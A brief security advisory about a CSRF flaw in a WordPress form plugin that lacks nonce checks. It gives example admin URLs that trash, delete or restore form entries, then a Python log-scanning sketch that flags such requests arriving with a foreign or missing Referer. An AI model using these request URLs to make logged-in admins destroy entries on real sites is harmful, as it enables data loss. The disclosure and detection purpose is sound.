The plugin does not enforce nonce checks, which could allow attackers to make a logged-in admin or editor delete and restore arbitrary form entries via CSRF attacks.
Single entry trash: https://example.com/wp-admin/admin.php?page=vfb-entries&action=trash&entry=2
Single entry permanent deletion: https://example.com/wp-admin/admin.php?page=vfb-entries&action=delete&entry=3
Single entry restoration: https://example.com/wp-admin/admin.php?page=vfb-entries&action=restore&entry=3
Bulk Trash
Bulk permanent delete
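
A detection sketch for the single-entry requests above, added here as an example and not taken from the plugin or the advisory: it scans web server access logs for `vfb-entries` trash/delete/restore requests whose Referer is missing or points to another site. The combined log format, the `SITE_HOST` value and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "example.com"  # assumption: the WordPress site's own host name
STATE_CHANGING = {"trash", "delete", "restore"}  # actions listed in the advisory

# Combined log format: ip - user [time] "METHOD target PROTO" status bytes "referer" ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

def classify(line):
    """Return None for unrelated lines, else a dict describing the entry action."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    qs = parse_qs(url.query)
    if not url.path.endswith("/wp-admin/admin.php") or qs.get("page") != ["vfb-entries"]:
        return None
    action = qs.get("action", [""])[0]
    if action not in STATE_CHANGING:
        return None
    ref_host = urlsplit(m["referer"]).hostname  # None when Referer is "-" or empty
    return {
        "time": m["time"], "ip": m["ip"], "action": action,
        "entry": qs.get("entry", [""])[0], "referer_host": ref_host,
        "suspicious": ref_host != SITE_HOST,  # cross-site or missing Referer
    }

def suspicious_events(lines):
    """Keep only entry actions that did not originate from the site's own pages."""
    return [e for e in map(classify, lines) if e and e["suspicious"]]

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=vfb-entries HTTP/1.1" 200 5120 "https://example.com/wp-admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:10:00:09 +0000] "GET /wp-admin/admin.php?page=vfb-entries&action=trash&entry=2 HTTP/1.1" 302 0 "https://example.com/wp-admin/admin.php?page=vfb-entries" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:10:03:44 +0000] "GET /wp-admin/admin.php?page=vfb-entries&action=delete&entry=3 HTTP/1.1" 302 0 "https://forum.example.net/thread/42" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:10:03:45 +0000] "GET /wp-admin/admin.php?page=vfb-entries&action=restore&entry=3 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for e in suspicious_events(SAMPLE_LOG):
        print(e["time"], e["action"], "entry", e["entry"], "referer:", e["referer_host"])
```

A missing Referer can also come from browser privacy settings, so treat hits as leads to correlate with the entry history rather than as confirmed CSRF.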